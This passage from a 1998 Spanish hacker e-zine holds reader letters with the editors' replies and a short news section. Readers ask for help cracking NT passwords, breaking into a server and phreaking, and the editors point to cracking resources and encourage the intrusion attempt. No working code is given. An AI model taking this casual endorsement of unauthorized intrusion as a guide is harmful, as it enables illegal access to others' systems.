  escuchar el grito solitario del chotacabras ni las discusiones nocturnas de 
  las ranas al borde de un estanque?. Soy un piel roja y nada entiendo. 
        Nosotros preferimos el suave susurro del viento sobre la superficie de
  un estanque, asi como el olor de ese mismo viento purificado por la lluvia
  del mediodia o perfumado con aromas de pinos. El aire tiene un valor
  inestimable para el piel roja, ya que todos los seres comparten un mismo
  aliento, la bestia, el arbol, el hombre, todos respiramos el mismo aire. El
  hombre blanco no parece consciente del aire que respira; como un moribundo
  que agoniza durante muchos dias es insensible al olor. Pero si les vendemos
  nuestras tierras, deben recordar que el aire nos es inestimable, que el
  aire comparte su espiritu con la vida que sostiene. El viento que dio a
  nuestros abuelos el primer soplo de vida tambien recibe sus ultimos
  suspiros. Y si les vendemos nuestras tierras, ustedes deben conservarlas
  como cosa aparte y sagrada, como un lugar donde hasta el hombre blanco
  pueda saborear el viento perfumado por las flores de las praderas. 
        Por ello, consideramos su oferta de comprar nuestras tierras y si
  decidimos aceptarla yo pondre una condicion: el hombre blanco debe tratar a
  los animales de esta tierra como a sus hermanos. Soy un salvaje y no
  comprendo otro modo de vida. He visto a miles de bufalos pudrirse en las
  praderas, muertos a tiros por el hombre blanco desde un tren en marcha. Soy
  un salvaje y no comprendo como una maquina humeante puede importar mas que
  el bufalo, al que nosotros solo matamos para sobrevivir 
        Que seria del hombre sin los animales? Si todos fueran exterminados,
  el hombre moriria de una gran soledad espiritual; porque lo que suceda a
  los animales tambien le sucedera al hombre, todo va enlazado. Deben
  ensearles a sus hijos que el suelo que pisan son las cenizas de nuestros
  abuelos.Inculquen a sus hijos que la tierra esta enriquecida con las vidas
  de nuestros semejantes a fin que sepan respetarla. Enseen a sus hijos que
  nosotros hemos enseado a los nuestros que la tierra es nuestra madre; y
  que todo lo que le ocurra a la tierra le ocurrira a los hijos de la tierra.
  Si los hombres escupen en el suelo, se escupen a si mismos. Esto sabemos:
  la tierra no pertenece al hombre; el hombre pertenece a la tierra. Esto
  sabemos: todo va enlazado, como la sangre que une una familia. Todo va
  enlazado.
        El hombre no tejio la trama de la vida; el solo es un hijo. Lo que
  hace con la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo
  Dios pasea y habla con el de amigo a amigo, queda exento del destino comun.
  Despues de todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que
  quiza el hombre blanco descubra algun dia: nuestro Dios es el mismo Dios.
  Ustedes pueden pensar ahora que El les pertenece, lo mismo que desean que
  nuestras tierras les pertenezcan, pero no es asi. El es el Dios de los
  hombres y su compasion se comparte por igual entre el piel roja y el hombre
  blanco. Esta tierra tiene un valor inestimable para El, y si se daa se
  provocaria la ira del Creador.
        Tambien los blancos se extinguiran, quiza antes que las demas tribus. 
  Contaminan sus lechos y una noche pereceran ahogados en sus propios
  residuos. Pero ustedes caminaran hacia su destruccion rodeados de gloria,
  inspirados por la fuerza de Dios que os trajo a esta tierra y que, por
  algun designio especial, les dio dominio sobre ella y sobre el piel roja.
  Ese destino es un misterio para nosotros, pues no entendemos por que se
  exterminan los bufalos, se doman los caballos salvajes, se saturan los
  rincones secretos de los bosques con el aliento de tantos hombres y se
  atiborra el paisaje de las exuberantes colinas con cables parlantes. Donde
  esta el matorral? Destruido.
        Donde esta el aguila? Desaparecio.Termina la vida y empieza la
  supervivencia.

 "Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y 
  debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas 
  ortograficas" Colaboracion por Pata. 

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ 

  <------>

  [ hhhhuuumm interesante, pero,  que es ? ]

<>

  From:  "Tono" <cmaragon@xxxxxxxxxxxxxx>
  Subject:  Info  

  Me gustaria que me dijeseis las IP de la web de LEOWORLD ya que actualmente
  esta con otra IP de la que vosotros habeis puesto.
  Y tambien si vosotros haceis lo mismo qie me dijeseis las IP por las que
  soleis poner vuestra web.
  NOTA: si no cambiais la IP olvidad lo 2nd 
 
  vuestra pagina es la mejor que he encontrado en espaol , asi que no la
  jodais, y lo que mas me ha gustado ha sido el simbolo "phi"  de la seccion
  de Crack.
 
  Stop..................... 

  <------>

  [  La IP de LEOWORLD ???, y nosotros no cambiamos y si lo hacemos no te
    preocupes que te enteraras :) ]

<>

  From:  default <default@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  hola desde el peru  

  Que tal amigos me parece que estan haciendo un buen trabajo pero diganme
  como seria posible que yo pudiera adquirir un ejemplar 
  respuestas al 
  hepe@xxxxxxxxxxxxxx 

  <------>

  [ Thx pero logicamente en nuestro web oficial y en nuestros distribuidores
    oficiales. ]

<>

  From:  "Juan Carlos" <j.tortola@xxxxxxxxxxxxxx>
  Subject:  ezine para Conde Vampiro y Mac Crack Bishop  
 
  Bueno tios el ezine es una pasada, desde luego estoy aprendiendo un huevo y
  parte del otro. A pesar de que soy un newbie, tengo ganas de comenzar en
  esto del mundo hack. Estoy realizando un generador de password aleatorio y
  con diccionario para claves de NT 4. Estas estan encriptadas con hash MD4 y
  necesito el codigo fuente de este algoritmo. Tambien necesito saber algo
  mas de como atacar en condiciones las particiones NTFS por que los programas
  PWdump y tal... Son un poco fuleros o por lo menos las versiones que yo
  tengo, solo permiten ver los directorios inutiles donde no hay nada
  interesante K:( Por cierto solo hablais de sistemas UNIX/LINUX, y muchos
  servidores funcionan con la basurilla del Sr. Bill Gates. La verdad es que
  no tengo mucha idea y creo que no puedo ofrecer una opinion real, sobre los
  Bugs del NT. Pero a un asi lo tengo en casa y ultimamente casca bastante.
  Me gustaria saber algunas cosas:
 
   - Teneis una BBS hack por la zona centro...
   - Que version de LINUX me recomendais.
   - Teneis intercambio de correo sobre desarroyo de hw y sw para realizar :-)
 
  Buneo no se se conseguire realizar algo guapo para el NT, de todas formas
  segun avance os envio codigo fuente y algunas pruebas para que lo
  publiqueis en el ezine, tengo intencion de adjuntar todos los programas
  posibles para hakear el sistema virus NT.
 
  A por cierto ya os he dicho que soy un newbie, pero tego ganas de ayudaros
  y aprender, si necesitais algo sobre electronica, micros, etc... podeis
  contactar conmigo.

  <------>

  [ Pues muchas gracias, ya sabemos que el ezine se a dedicado mucho a Unix,
    pero eso no significa que no trabajemos con NT, mas adelante iremos
    poniendo cosillas :)
    Para pillar cosas buenas de NT, te recomendamos los siguientes urls :

    http://l0pht.com/
    http://207.98.195.250/  (Rhino9)
    http://www.ntshop.net
    http://ciac.llnl.gov/ciac/ToolsUnixSig.html#Md4  Codigo del MD4   

    Por desgracia no contamos con BBS, sobre Linux depende lo que quieras
    hacer y por el momento no tenemos mailing list pero estamos en ello.
    Pues ya sabes envianoslo cuando lo tengas listo, tenemos ganas de verlo. ]

<>

  From:  jaina7@xxxxxxxxxxxxxx (grieko)
  To:  jjf_team@usa.net  
  Subject:  hola como estan  
 
  saben su page esta muy bien pero baje un archivo que decia 
  hackear page en espaol pero nada estaba en ingles 
  espero que pronto lo pongan en espaol 

  <------>

  [ Pues eso a sido un descuido del webmaster y ese documento no sera
    traducido por nosotros por lo que si alquien lo quiere traducir, pues ya
    sabe. ]

<>

  From:  c_plaza@xxxxxxxxxxxxxx
  To:  jjf_team@usa.net  
  Subject:  informarles y agradecimiento  
 
  un saludo antes que nada y gracias por la informacion que brindan a todos
  los cibernautas de este planeta. 

  me dirijo en la oprtunidad de avisarles que tengo una pagina en la cual he 
  utilizado fragmentos de sus composiciones asi como tambien les recomiendo a
  las personas que visiten mi pagina, que para mayor informacion se dirijan a
  la pagina de ustedes. mi pagina es
  http://www.geocities.com/Heartland/Plains/3102

  nota: espero que si esta en la posibilidad de ustedes me sirvan dar algunos 
  consejos. 

  att. Carlos Plaza 

  <------>

  [ Okis :) ]

<>

  From:  plaxius <plaxius@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  Proyecto_R !!  
 
   Hola estimados : 

  Un gustazo saludarlos de nuevo , y felicitarlos ya que el numero cuatro 
  estubo fantastico y parece que esto suma y sigue . Bueno solo queria 
  contarles que ya hemos terminado el primer nuemro de 
  Proyecto_R , los invito a que nos den su sincera opinion y criticas 
  ojala constructivas , para que nos ayuden a mejorar ciertos aspectos del
  E-Zine la verdad es bastante pobre (creo yo ) pero tendra que 
  ir mejorando a medida que se nos unan mas colaboradores . Les adjunto el 
  primer numero y si puden poner un enlze desde vuestro web como tambien 
  mencionar la direccion en su E-Zine , estaria eternamente agradecido ... 

  URL Proyecto_R : http://www.bigfoot.com/~proyecto_r 

  http://www.geocities.com/colosseum/sideline/9497 

  GRacias ...---- 

  PlaXiuS . 

  <------>

  [ Claro que os ponemos un enlace :) y a todos nuestros lectores decirles
    que pasaros por el url y pillad este nuevo ezine. Nos ha gustado mucho
    el ezine y esperamos que siga mejorando. ]

<>

  From:  "SPIDER" <jlcastil@xxxxxxxxxxxxxx>
  Subject:  saludo  
 
  Les envio un saludo, y felicitaciones por su magnifica pag. 

  Espero que esto lo hagan aun mas grande, es genial 

  hasta pronto... 

  ATTE: SPIDERIDER 

  <------>

  [ thx, estamos en ello. ] 

<>
 
  Date:  Sun, 02 Aug 1998 13:05:55 GMT  
  From:  "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Ayuda  
 
  Estimado Conde Vampiro: No soy ni H/P/C ni nada que se le parezca. Ni 
  siquiera soy un Lamer. Mi actividad es el periodismo de investigacion 
  (corrupcion politica, negociados turbios, etc.). Por supuesto que esto 
  molesta a algunos y es por eso que me dirijo a uds. para preguntarles si 
  me pueden dar alguna ayuda. Tengo mis lineas telefonicas pinchadas, o 
  sea escuchan mis conversaciones. Algunas son importantes para descubrir 
  cosas sucias y corren peligro mis fuentes de informacion si son 
  identificadas. Mi requerimiento es: existe algun programa (tengo una 
  Pentium 100 con Windows 95) que me permita escudriar la linea y poder 
  detectar si me estan grabando o interceptando la comunicacion?. De no 
  existir, conocen algun diseo electronico que permita construir algun 
  rastreador (que tenga componentes baratos ya que mi cuenta esta vacia)?. 
  Es posible una vez detectado el hijo de puta fizgon mandarle algo para 
  que no joda mas?. Desde ya les agradezco todo lo que puedan hacer para 
  darme una ayuda. Lamento no saber Unix, y tambien lamento no ser mas 
  joven. Ya cerca de los 50 me resulta un tanto pesado estudiar, aunque 
  trato de leer algo nuevo de programacion todas las veces que puedo. 
  Tengo la oportunidad ahora de leer un par de libros para empezar a 
  programar en Java. Me gustaria me dieran su opinion si vale la pena o 
  mejor me dedico a seguir persiguiendo politicos sucios. Por ultimo, mi 
  ingles tecnico no es demasiado abultado, por ello si encuentran algo en 
  castellano mejor. Un abrazo y sigan asi. Me gusta mucho leer la pagina 
  JJF Hackers Team. Chau. Alfredo. 

  <------>

  [ Esto me suena a peli de James Bond :), pues decirte que hay varias
    empresas que se dedican a estos asuntos. En barcelona y en Madrid tienes
    unas tiendas llamadas LA TIENDA DEL ESPIA, en la que podras comprar
    encriptadores para las conversaciones telefonicas y mas juguetes.
    Y que no te cojan alfredo :) ]

<>
 
  Date:  Tue, 04 Aug 1998 19:03:52 GMT  
  From:  Sergio <carlos29@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Hola COnde  
 
  Hola soy Sergio y me interesaria un buen programa para pasarme los 
  passwords que me piden las web porno, tengo WINDOWS95 ya me diras
  alguna cosa gracias soy carlos29@xxxxxxxxxxxxxx Adios 

  <------>

  [ Por favor !!!!! tenemos mejores cosas que hacer. ]

<>

  From:  "Pablo Garcia del Pino" <icelord@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  Problemas en tus URL  
 
  Tio: 
 
  Muy buena pagina la tuya pero... cuando vas a bajarte por ejemplo los tonos
  de la red-box, informacion para red-box etc... Te encuentras el error 404
  es decir que el link de URL no existe.
  Por favor, este tema me interesa bastante, con lo que a ver si pudierais
  enviarme estos archivos, o si no decirme como conseguirlos.

  Gracias. 

  Icelord 

  http://www.pasanet.es/usuarios/icelord/ 

  icelord@xxxxxxxxxxxxxx 

  <------>

  [ Ya decimos que los links en los webs son dificl de mantener, pero
    el webmaster hace lo que puede. ]

<>
 
  Date:  Fri, 14 Aug 1998 18:45:35 GMT  
  From:  Cain <Nod@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Para el e-zine ( Correo del lector)  
 
  Sonara muy tipico.. pero felicidades por vuestra pagina, y gracias por 
  ensearnos.... Bueno mejor voy al grano ok? Bien en el e-zine he visto 
  que explicais cosas sobre el hacking, pero siempre bajo Unix. A alguien 
  se le ha ocurrido la idea de hacerlo desde Windows? ( No os riais de mi 
  please ) Soy consciente de que a muchos programadores la simple idea de 
  trabajar con windows les parece ridicula, y que consideran que es un 
  sistema para supernovatos... y tal vez sea asi, pero tambien es verdad 
  que se puede hacer hacking desde windows o no? La seorita Carolyn 
  Meinel asi lo explica, y el seor IPgh0st hace la traducion de dichos 
  documentos... entonces.. porque no se amplia mas sobre el tema? Son 
  conscientes de que para millones de usuarios, que usan Windows por 
  motivos varios les seria mucho mas facil trabajar desde este "Sistema?" 
  ( Lo pongo entre comillas para que nadie se me ofenda ok?) Bueno pues lo 
  dicho, creo que seria interesante abarcar esa posibilidad, aqunue soy 
  consciente que es una tarea un tanto pesada... Igualmente estoy 
  convencido que se haria un gran favor a los aprendices de hackers ( 
  Incluyendome entre ellos). 
  Gracias por dedicar su tiempo a mi e-mail, y espero seguir 
  disfrutnado de su informacion, y de sus sabios consejos. 

                               And he exilied me 
                               To wander in darkness 
                               The land of Nod 
                               I flew into the darkness 
                               I saw no source of light 
                               And I was afraid 
                               And Alone. 

                                            Fragment of Book of Nod. 
                                                                     
  Cain. 

  <------>

  [ Thx,  Pero quien dice que no tocamos nada sobre windows ?, pues
    seguro que este numero te gustara :), ademas nosotros estamos trabajando
    en varios proyectos para windows que iran saliendo durante este ao.
    Pero esperamos que los lectores tambien nos envien articulos sobre
    windows. ]

<>
 
  Date:  Mon, 17 Aug 1998 19:28:58 GMT  
  From:  "ZeD" <ZeD@xxxxxxxxxxxxxx>      
  Subject:  varias cosas  
 
  hola os mando esto para deciros varias cosas,la primera es que lei una 
  carta de un lector en el n5 de la revista,que decia que le gustaria que en 
  vuestro e-zine saliese una especie de "dicciohack",la verdad es que no me 
  parece mala idea,ya que muchos de los terminos que se usan cambian de 
  nombre y ademas no siempre se conocen todos,ya que salen nuevos cada muy 
  poco tiempo. 

  en segundo lugar queria comentar a todos los que os escriben diciendoos que 
  quieren aprender hackear,que si lo haces bien,le pones empeo ypor supuesto 
  no es una "vena" transitoria de esas que nos dan a todos de vez encuando 
  despues de leer o ver alguna azaa en television o en algun periodico,no es 
  tan dificil aprender y desde este como desde muchos e-zines y webs podeis 
  ir aprendiendo (poco a poco claro,esto noes algo que se prenda en dos 
  semanas),existen mogollon de libros sobre seguridad informatica,sistemas 
  operativos...ect... que si los lees,puedes parender muchas cosas,ademas no 
  dicen que en internet esta todo? pues buscad guias de iniciacion o 
  documentos para "newbyes" (o como coe se scriba la palabreja esa). 

  la tercera cosa que queria comentaros es una cuestion que me preguntaron el 
  otro dia en un canal de irc y la verdad es que no supe contestarte,la 
  pregunta que me hicieron es la siguiente: 
  "se puede hackear (se referia a entrar en un sistema,obviamente) desde 
  windows95?" yo la verdad es que no lo se y apartir de que me hizieran esa
  pregunta,a mi tambien me corroe la curiosidad,como ya se que si se puede no
  vais a decir el como,no os lo pregunto,simplemente me gustaria un "si" o
  un "no" ;-)

  mas cosillas,como decis vosotros sin colaboracion no hay trabajo,por lo 
  tanto les mando tres textos para que,si quereis los incluyais en el proximo 
  n de vuestro e-zine.el primero es sobre como trucar el windows95,aqui 
  explico la manera de adecuar el SO mas utilizado (por desgracia o por 
  fortuna,segun para quien),al gusto del usuario y no al de los creadores del 
  jodio sistema en cuestion. 
  el segundo es una especie de guia para el irc en la que explico como 
  conseguir cosas (contraseas...etc...) por medio de ingenieria 
  social,tambien incluye una pequea guia de como usar dos de las tools que 
  hay para los famosos PWL. 
  el tercer texto va dedicado a los phreackers novatos o gente que se quiera 
  iniciar en este campo,entre las cosas que se comentan en este texto incluyo 
  una descripcion de algunas de la BOX mas conocidas.os los mando los 3 
  comprimidos en un zip para que ocupen menos y no tardeis mucho en bajaros 
  este e-mail. 

  deciros que soy miembro del grupo HaCk`S-wEb-RiNg y que siempre que sale un 
  nuevo n de vustro e-zine lo pillamos rapidamente por que mola mazo y 
  deciros que en nombre de todo el grupo,os mandamos un saludo,si quereis 
  visitar nuestra web.... 
  lo llevais claro por que todavia esta "under construccion" pero ya le falta 
  menos y cuando este acabado en los link`s pondremos uno a vuestra web,que 
  mola mazo fale? :-) 

  por cierto (ya acabo) en algunos e-zines (no voy a decir cuales) tienen una 
  "lista de correo" en la que avisan cuando sale un nuevo n por que no 
  haceis vosotros lo mismo? 

  bueno siento averos dado la barrila pero he tardado en decidirme a 
  escribiros y ahora lo suelto todo de golpe ;-) 
  un saludo y feliz HaCk (esto me suena) bye 

  { ZeD ----- http://www.angelfire.com/ak/HACKZED/ZED2.html ------ } 
  esta es la direccion de mi web,por si la quereis poner en el e-zine 

  <------>

  [ Sobre un diccionario hack ya hemos pensado sobre ello y mas adelante ya
    veras :) Decirte sobre win95 "SI". Sobre el mailing list estamos en ello,
    pero no hemos dicho nada ya que dentro de poco habra cambios radicales en
    el website ;-)
    Thx por tus artis y nos gusta que otros grupos nos apoyen, saludos de
    - J.J.F. / HACKERS TEAM -, por cierto hemos visto tu ezine y tu web :)
    y decirte que este ezine se llama J.J.F. / HACKERS TEAM JOURNAL. byes ]

<>

  From:  "Pepe Pepe2" <sir_ich@xxxxxxxxxxxxxx>
  To:  conde_vampiro@usa.net  
  Subject:  Sir Ich  

  Hola conde soy Sir Ich, estoy leyendome los articulos que realizas sobre
  hackers y quisiera saber si podrias decirme algun texto mas donde 
  empezar porque quiero aprender en esto del hack. 

  Por cierto me gustaron bastante tus articulos. 

  Lo que me gustaria es que me ensearas o que me dieras consejos o textos 
  sobre como empezar en esto del hack. 

  Bueno sin mas me despido hasta la proxima esperando tu respuesta. 

  Muchas gracias por leer esta carta y por haberme atendido. 

  Mi correo es sir_ich@xxxxxxxxxxxxxx 

  <------>

  [ Bueno pues logicamente tienes nuestro/vuestro ezine que es un medio ideal
    para aprender, pero no solo de textos vive el hacker :)
    Nuestro consejo es el de siempre, estudia, aprende y mejora las cosas. ]

<>
  
  Date:  Tue, 18 Aug 1998 16:54:02 GMT  
  From:  "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Cc:  mr.electro@usa.net  
  Subject:  Ayuda  
 
  Muchachos, estoy en un problema. Soy periodista y hago notas 
  investigando a politicos corruptos, policias corruptos, jueces 
  corruptos, en fin, a toda la lacra que anda dando vueltas por ahi. 
  Descubri que me pinchan mis lineas telefonicas y escuchan y graban mis 
  conversaciones, lo que -por supuesto- me jode y ademas pone en riesgo a 
  mis informantes (gente decente que cree que los hijos de puta tienen que 
  estar en una jaula y los buenos disfrutar la vida). Primera pregunta: 
  hay algun programa que me permita descubrir con certeza la pinchadura y 
  localizar al espia?. Segunda pregunta: Si existe, es posible bloquear e 
  impedir que me escuchen y graben?. Tercera pregunta: Hay manera de 
  romperles el culo cagandoles el equipo que estan usando?. Cuarta 
  pregunta: Si todo lo anterior es negativo, habra por ahi planos y 
  manuales en castellano para construir algun aparatito electronico que 
  realice la tarea descripta mas arriba?. Si necesitan mas datos acerca 
  del tipo de central y equipos que tiene la proveedora del servicio 
  telefonico, avisenme que lo averiguo y se los paso. Muchas gracias desde 
  ya, y quedo a la espera de alguna novedad de uds. Un abrazo. 
  Alfredo 

  <------>

  [ Otra vez el espia !!! Pues ya te hemos dado la respuesta mas arriba, y
   estas cosas si que se pueden realizar pero tienes que ser un manitas en
   phreaking y por supuesto electronica, hhhuum cosa que veo dificil. ] 

<>
 
  Date:  Sun, 23 Aug 1998 15:30:31 GMT  
  From:  "ADRIAN" <admar@xxxxxxxxxxxxxx>      
  Subject:  me_gusta_mucho_la_presentacion__  
 
  Bueno tienen un monton de programas buenisimos,y actuales, se ven poco por
  la red asi que sigan adelante muchachos ,otra cosa me mandan la direccion
  de la pagina en internet?
  es que la encontre en un buscador cabron que no me deja ver la direccion.. 

  <------>

  [ Pues facil, cuando te pones encima de nuestro enlace en ese buscador
    seguro que te sale nuestro url abajo a la izquierda en tu navegador.
    Ademas si pinchas encima te sale nuestro url en el prompt del navegador
    y encima nuestro url sale en nuestro ezine, creo que mas facil no se
    puede :) ]

<>
 
  Date:  Sat, 29 Aug 1998 08:20:37 GMT  
  From:  "Ana Maria Hermida" <ahermida@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
 
  Hola 

  Estoy algo desesperado y no se que hacer. Llevo mas de 5 meses 
  intentando entrar en un server. 
  He sacado mucha informacion sobre los ordenadores que estan en su red 
  (tengo mas de 20) y sobre 
  los protocolos que otiliza en cada uno de sus puertos, asi como los 
  dorectorios que exporta. 
  Pero parece que todas las versiones estan libres de bugs ... que puedo 
  hacer? como podria 
  entrar en alguno de esos server? En todos los manuales y articulos de 
  las revistas pone que 
  es muy facil y blablabla pero yo no consigo nada ... y eso que tengo 
  buenos conocimientos de 
  informatica :( 

  Me puedes echar una mano? gracias 

  <------>

  [ Pues que decir, no conozco ningun sistema perfecto libre de bugs.
    No estaras enfocando correctamente la situacion, revisa a fondo toda la
    informacion que has recopilado. Pero si tan frustado estas mejor dejalo,
    en el hack no todo son alegrias y exitos. ]

<>

  Date:  Sat, 29 Aug 1998 09:57:42 GMT
  From:  "ZeD" <ZeD@xxxxxxxxxxxxxx>      
  Subject:  virus muy raro  
 
  hola vereis no se si os acordareis de mi (os mande tres textos hace una dos 
  o tres semanas) tengo un "pequeo" problema con algo que creo puede ser un
  virus a ctualmente estoy usando el WINDOWS95 y hoi (29/8/98) se me a
  activado lo que creo puede ser un virus lo que hace este es lo siguiente 
  al abrir cualquier cosa con el NOTEPAD (solo con el note,con el wordpad no 
  me pasa nada) 
  la pantalla se me llena de iconos de error (el del windows que es un 
  circulo rojo con una "X" blanca en medio) 
  estos los puedo "borrar" si paso por encima de ellos el documento que he 
  abierto 
  me pasa lo mismo cuando intento conectarme a internet y tambien los puedo 
  borrar si paso el cuadro de dialogo 
  (el de "conectando a internet") por encima de ellos. 
  actualmente uso el antivirus ANYWARE y este no me detecta nada raro y la 
  verdad no se de que virus se puede trar y mucho menos como eliminarlo. 
  yo la verdad es que de virus no tengo ni idea,por eso recurro a vosotros 
  aver si,vosotros o alguno de vuestros lectores saben como poder ayudarme 
  con el "virus" (o lo que sea). 

  si vosotros no podeis ayudarme y publicais esto en el e-zine poned esta 
  direccion de correo para que me contesten (si alguien sabe la respuesta 
  claro) la dire es: zed@mixmail.com 

  bueno,no os aburro mas un saludo 

  \\'// 
  (o -) 
  -ooO--(_)--Ooo- 
  --..--ZeD--..-- 
  http://www.angelfire.com/ak/HACKZED/ZED2.html 
  http://come.to/HaCkS-wEb-RiNg 
  !visitalas 
  !!EL DIA 3/9/98 TODOS A LA HUELGA 

  <------>

  [ Es la primera vez que oigo semejante historia, si esto es un virus lo
    desconozco pero huele mas al tipico programa bromista de win95, has
    mirado en Inicio o en el registro, en busca de algo sospechoso. ?
    Si algun lector reconoce estos sintomas pues que nos escriba. ]

<>
 
  Date:  Sun, 30 Aug 1998 16:58:52 GMT  
  From:  Muerte <necrolibro@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Red IRC Union Latina  

   NecroSaludos, 

  Pueeee... no habia descubierto su e-zine hasta hace poco, y ke esta 
  muuu bien y es muu interesante. A parte, me gustaria incluir un link a 
  su pagina, pues eso dense una vuelta por la web de abajo del tooo (si la 
  de Necronomicon...) y se meten en la Guia de Temas Olvidados y luego en 
  Aadir un Enlace y rellenan el formulario, pa meterles un enlace dentro 
  de la seccion Red. Ke porke no se lo meto yo... pues porke no se ke 
  descripcion meterles, y como ya hice con SET les escribe un e-mail y les 
  dije ke me dijesen una descripcion, y luego yo la meto... 

  A parte de esto... pasando al tema ke me ocupa. Seguro ke ustedes 
  conocen mazo de redes de IRC, pero Hispanas, pueee seguro ke conocen el 
  IRC-Hispano, pero y a parte de esa?, ninguna tal vez, pues yo les 
  escribo esto pa decirles ke hay una alternativa al IRC-Hispano y se 
  llama... Union Latina, sus servers son los siguientes: 

  Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org 
  Union Latina: Digital (ES, Madrid): madrid.unionlatina.org 
  Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org 
  Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org 
  Union Latina: Lander (ES, Madrid): lander.unionlatina.org 
  Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org 
  Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org 

  Su pagina web oficial es: 

  http://www.unionlatina.org 

  Su bot es KaOs, y no tiene nada ke ver con el amigo Scytale. Pues pa ke 
  les interesa esto, seguro ke hay mazo de gente, como yo, ke somos 
  usuarios de proveedores de bancos y ke tenemos la entrada prohibida 
  (G-Line) al IRC-Hispano o ke estamos hasta los gevos de tanto 
  IRC-Hispano... Pues ya tienen una alternativa real. Seguro ke si se dan 
  una vuelta les convence... 

  Pues nada solo keria ke dieran a conocer esta info en su e-zine, si pa 
  ke la gente sepa ke hay una alternativa a la Red IRC-Hispano. Y ke esta 
  muy bien esa alternativa se llama Union Latina y sus IRCops son muuu 
  majos. 

  Pues naaa maxx... si puedo ayudarles en algo diganmelo.. y sigan asi y 
  pa mas arriba... 

  Mushas gracias por tooo y sigan asi... 

  Un Saludo de Muerte (Director del Necronomicon) 

  NECRONOMICON (El Libro de los Muertos) 
  http://members.xoom.com/necrolibro 

  EN EL IRC: 

  Nick: |Muerte 
  Lugar: #necronomicon en Union Latina 
  Todos los sabados y domingos sobre las 16:00 

  <------>

  [ Thx pero nosotros ya conociamos la existencia de esta red de IRC en
    Espaa junto con la de Hispanos y otras academicas.
    Pero para el que no lo sepa ya no tiene excusa :) ]

<>

<>

                           ------------------------
                           - NOTICIAS UNDERGROUND -
                           ------------------------
  
                                                - J.J.F. / HACKERS TEAM -

<>
  INDICE DE LAS NUEVAS Guide to (mostly) Harmless Hacking

  # Vol. 5 Programmers' Series

    No. 2: Shell Programming: an Exploit Explained, Part 1


  # Vol. 5 Programmers' Series

    No. 2: Shell Programming: an Exploit Explained, part 2


  # Vol. 5 Programmers' Series

    No. 3: More on Advanced Unix Shell Programming


  # Microsoft-only version Number 1

    Getting Serious with Win95


  # Microsoft-only version Number 2

    Hacking with Win95/NT: Batch File Programming


  # Microsoft-only version Number 3

    Hacking with Win95/NT:  How to Telnet

    How to Break into a Windows 95 Computers from the Internet


  # Vol. 3 No. 7, Part 1

    Introduction to Computer Viruses


  # Vol. 3 No. 7, part 2

    Introduction to Computer Viruses


  # Vol. 6 Real Hackers

    No. 2: Harold Willison


  # Vol. 3 No. 8, Part 1

    The Magical Mystical Crypto-Primer


  # Vol. 3 No. 8, Part 2

    The Magical Mystical Crypto-Primer

<>
   QUIEN SE QUIERE PROTEGER DE LOS HACKERS ? EL GRUPO SHADOW LO SABE.

  OTC 7/23/98 8:25 AM 

  WASHINGTON, D.C., U.S.A., 1998 JUL 23 (Newsbytes) -- 

  By Shawn P. McCarthy, Government Computer News. 
                            
        Los Hackers han ayudado a romper las redes del gobierno. Ellos
  comparten sus recursos y tecnicas en determinadas listas de correo y en
  areas de chat encriptadas. Los adminstradores de seguridad del Gobierno
  Americano estan formando grupos similares para combatir de una forma mas
  eficaz a los intrusos.
                                                              
        Un pequeo grupo de experto en seguridad del gobierno han estado
  usando este metodo con el sector opuesto de la industria. El intercambio
  a servido para formar un concenso, no del todo aceptado, sobre que hacer
  cuando una red privada a sido penetrada por un intruso via Internet.
                                                                         
        El grupo Shadow incluye representantes de diferentes departamentos
  de defensa, Laboratorio Nacional de los Alamos. Los representantes
  corporativos provienen desde General Dynamics Corp hasta Disney Online.
                                                    
        Dos grandes esfuerzos han sido obtenidos en este proceso. El primero
  es un libro: Computer Security Handling Step by Step. Publicado por Sans
  Institute of Bethesda, Md., disponible en http://www.sans.org, el libro
  cuesta $27 y discute como combatir a un intruso, ataques denial of
  service, cyberladrones y otros temas de seguridad.
                     
        El libro cita seis estados de responsabilidad: preparacion, deteccion,
  contencion, eradicacion, recuperacion y seguimiento. Pero se enfoca mas en
  la parte de preparacion. Hace hincapie otra vez en proteger la red antes
  de que sea atacada.
          
        El grupo Shadow encontro que un buen lugar para empezar es justificar
  un gasto para invertir en una infraestuctura de seguridad. Tambien encontro
  que muchos sitios no tienen una solida politica de seguridad o incluso una
  filosofia en vez, que relentiza y complica las cosas cuando los incidentes
  ocurren.
                                                                             
        "Cada uno debe escoger la filosofia que ahi que seguir y conseguir
  presupuesto," dice Northcutt, antes de formular un plan de responsabilidad.
  Y el grupo aprendio que todos necesitan entrenamiento en el area de
  seguridad.
                                    
        El grupo decidio que lo que funciona con organizaciones grandes no
  siempre funciona con las pequeas. Grupos grandes han dedicado personal
  para contener los incidentes. Las pequeas generalmente emplean a un solo
  miembro cuando ahi indicios de penetracion.

        Un inadecuado administrador de red, por exemplo, puede estar usando
  una cuenta privilegiada que el administrador nunca haya usado antes. Eso
  le daria pistas al intruso de que ha sido descubierto, por lo que el
  intruso podria destruir las evidencias y causar otro tipo de daos.

        Las discusiones del grupo Shadow revelan los puntos de los ataques
  Hackers. Los miembros coinciden en las maneras de como combatir contra
  codigo malicioso (usando antivirus, scanners para paquetes inexplicables
  enviados automaticamente desde tu red hacia Internet).
                                                        
